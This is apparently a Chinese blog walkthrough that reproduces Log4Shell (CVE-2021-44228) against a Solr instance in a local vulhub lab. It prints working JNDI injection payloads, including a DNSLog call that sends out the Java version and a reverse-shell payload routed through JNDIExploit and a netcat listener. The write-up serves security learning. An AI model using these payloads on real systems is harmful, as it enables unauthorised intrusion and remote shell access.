log4j-CVE-2021-44228-vulhub复现

使用kali上的vulhub去打开

我们输入在kali当前终端输入docker-compose up -d --build

启动靶场

但是启动靶场时出现了报错问题,网上搜索解决方法

解决方法:给管理权限

在kali终端输入:sudo docker-compose up -d  

下面可以看到靶场正在启动

接着输入 http://127.0.0.1:8983/solr/#/

可以看到靶场成功打开

Dnslog测试

DNSLog Platform  //dnslog平台网址

我们在kali上第二个窗口打开dnslog平台进行记录,点击get subdomain请求一个dns域名

得到dns域名:lfjceo.dnslog.cn

 在靶场上传参:/admin/cores?action=${jndi:ldap://${sys:java.version}.lfjceo.dnslog.cn}http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.lfjceo.dnslog.cn}

点一下右边那个refresh,查看dns

此时直接得到版本信息:1.8.0

进入最后一步,反弹shell

反弹shell需要使用JNDIExploit.v1.2,可以从下面百度网盘直接下载:

https://pan.baidu.com/s/1lxXt-27-i7I_dOUACphVtQ 提取码: nkc5

中转机:10.211.55.3 

中转机java版本:1.8.0_172

首先在中转机上使用JNDIExploit-1.2-SNAPSHOT.jar文件使用java启动,命令如下:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.211.55.3

 其中:10.211.55.3为中转机的ip地址

 然后在攻击机上开启监听:nc -lvvp 6666

此时构造如下命令: (payload构造不需要经过base64编码)

http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://10.211.55.3:1389/Basic/ReverseShell/10.211.55.23/6666}
  • http://127.0.0.1:8983为靶机的地址

  • 10.211.55.3为中转机地址

  • 10.211.55.23为Kali攻击机ip地址,此时要反弹shell

执行,反弹shell

打开中转机

 成功,我们需要清除靶机

docker-compose down

 

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值